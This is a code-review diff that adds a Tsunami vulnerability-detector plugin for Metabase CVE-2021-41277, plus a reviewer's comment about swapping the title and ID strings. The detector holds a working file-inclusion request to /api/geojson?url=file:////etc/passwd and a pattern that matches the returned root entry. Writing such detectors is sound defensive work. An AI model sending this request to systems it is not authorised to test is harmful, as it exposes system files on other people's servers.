community/detectors/metabase_cve_2021_41277/src/main/java/com/google/tsunami/plugins/detectors/metabase/MetabaseCve202141277Detector.java

```diff
@@ -0,0 +1,123 @@
+import javax.inject.Inject;
+
+/**
+ * A {@link VulnDetector} that detects MetaBase Local File Inclusion(CVE-2021-41277)
+ */
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "MetabaseCve202141277Detector",
+    version = "0.1",
+    description = "This detector checks for MetaBase Local File Inclusion(CVE-2021-41277).",
+    author = "C4o (syttcasd@gmail.com)",
+    bootstrapModule = MetabaseCve202141277DetectorBootstrapModule.class)
+public final class MetabaseCve202141277Detector implements VulnDetector {
+
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+  private static final Pattern VULNERABILITY_RESPONSE_PATTERN = Pattern.compile("(root:[x*]:0:0:)");
+
+  private final Clock utcClock;
+  private final HttpClient httpClient;
+
+  @Inject
+  MetabaseCve202141277Detector(@UtcClock Clock utcClock, HttpClient httpClient) {
+    this.utcClock = checkNotNull(utcClock);
+    this.httpClient = checkNotNull(httpClient);
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(NetworkServiceUtils::isWebService)
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService)
+        + "/api/geojson?url=file:////etc/passwd";
+    try {
+      HttpResponse response =
+          httpClient.send(get(targetUri).withEmptyHeaders().build(), networkService);
+      if (response.status() == HttpStatus.OK && response.bodyString().isPresent()) {
+        if (VULNERABILITY_RESPONSE_PATTERN.matcher(response.bodyString().get()).find()) {
+          return true;
+        }
+      }
+    } catch (IOException e) {
+      logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri);
+    }
+    return false;
+  }
+
+  private DetectionReport buildDetectionReport(
+      TargetInfo targetInfo, NetworkService vulnerableNetworkService) {
+    return DetectionReport.newBuilder()
+        .setTargetInfo(targetInfo)
+        .setNetworkService(vulnerableNetworkService)
+        .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli()))
+        .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+        .setVulnerability(
+            Vulnerability.newBuilder()
+                .setMainId(VulnerabilityId.newBuilder().setPublisher("TSUNAMI_COMMUNITY")
+                    .setValue("Metabase CVE-2021-41277 Local File Inclusion Vulnerability"))
+                .setSeverity(Severity.CRITICAL)
+                .setTitle("CVE_2021_41277")
```

Comment:
Sorry for the confusions. I mean `setTitle` to `Metabase CVE-2021-41277 Local File Inclusion Vulnerability` and `MainId.setValue` to `CVE_2021_41277`.